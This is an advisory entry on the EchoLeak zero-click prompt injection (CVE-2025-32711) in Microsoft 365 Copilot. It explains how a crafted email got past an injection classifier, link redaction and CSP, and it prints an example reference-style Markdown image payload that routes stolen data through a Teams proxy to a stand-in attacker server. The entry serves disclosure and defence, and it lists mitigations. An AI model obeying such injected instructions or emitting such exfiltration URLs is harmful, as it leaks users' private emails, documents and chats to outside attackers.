EchoLeak Zero-Click Data Exfiltration

Description: A zero-click indirect prompt injection vulnerability, CVE-2025-32711, existed in Microsoft 365 Copilot. A remote, unauthenticated attacker could exfiltrate sensitive data from a victim's session by sending a crafted email. When Copilot later processed this email as part of a user's query, hidden instructions caused it to retrieve sensitive data from the user's context (e.g., other emails, documents) and embed it into a URL. The attack chain involved bypassing Microsoft's XPIA prompt injection classifier, evading link redaction filters using reference-style Markdown, and abusing a trusted Microsoft Teams proxy domain to bypass the client-side Content Security Policy (CSP), resulting in automatic data exfiltration without any user interaction.

Examples: An attacker sends an email containing hidden instructions disguised as normal text to a victim. The instructions are designed to be triggered when Copilot summarizes or processes the email.

The instructions coerce Copilot into generating a response containing a Markdown image. This payload bypasses link-stripping defenses by using reference-style syntax and bypasses the Content Security Policy by using a trusted Microsoft Teams domain as a proxy to reach the attacker's server. The sensitive data is appended to the URL as a parameter.

When the victim's client (e.g., Outlook, Teams) renders Copilot's response, it automatically attempts to fetch the image, sending the sensitive data to the attacker's server.

Example payload generated by the compromised Copilot:

Project summary is ready. See details below.

![image alt text][ref]

[ref]: https://asyncgw.teams.microsoft.com/urlp/v1/url/content?url=https://attacker-server.com/log?data=[SENSITIVE_DATA_EXTRACTED_BY_COPILOT]

Impact: Successful exploitation allows a remote, unauthenticated attacker to exfiltrate sensitive data accessible to the victim's Copilot instance, including the contents of private emails, documents, and chats. The attack is zero-click, requiring no user interaction beyond Copilot processing the malicious email, and achieves a full bypass of the LLM's trust boundaries, escalating the privileges of an external attacker to that of the internal user.

Affected Systems: Microsoft 365 Copilot services prior to the server-side fix deployed in May 2025.

Mitigation Steps:

• Strict Prompt Partitioning: Enforce a hard separation between trusted content (e.g., user queries) and untrusted content (e.g., external emails) within the LLM's prompt. Tag data by its source and instruct the model not to execute commands from untrusted sources.
• Enhanced Input/Output Filtering: Strip or neutralize potentially malicious syntax from inputs and outputs, specifically including reference-style Markdown links and all URLs originating from untrusted domains.
• Strict Content Security Policy (CSP): Apply a strict CSP to the rendering surface to prevent loading resources from non-allowlisted domains. Disallow image embeds (img-src) from all but essential, trusted origins and harden any allowlisted proxy endpoints against being used as open redirects.
• Principle of Least Privilege for AI: Restrict the model's access by default. Use provenance-based access control to prevent the AI from combining data across different trust boundaries (e.g., do not use content from an external email to answer a query about an internal project).
• Output Validation: Treat all model outputs as untrusted. Scan outputs for sensitive data patterns, PII, credentials, and suspicious URLs before rendering them to the user. Block or require user consent for any outbound network requests embedded in the response.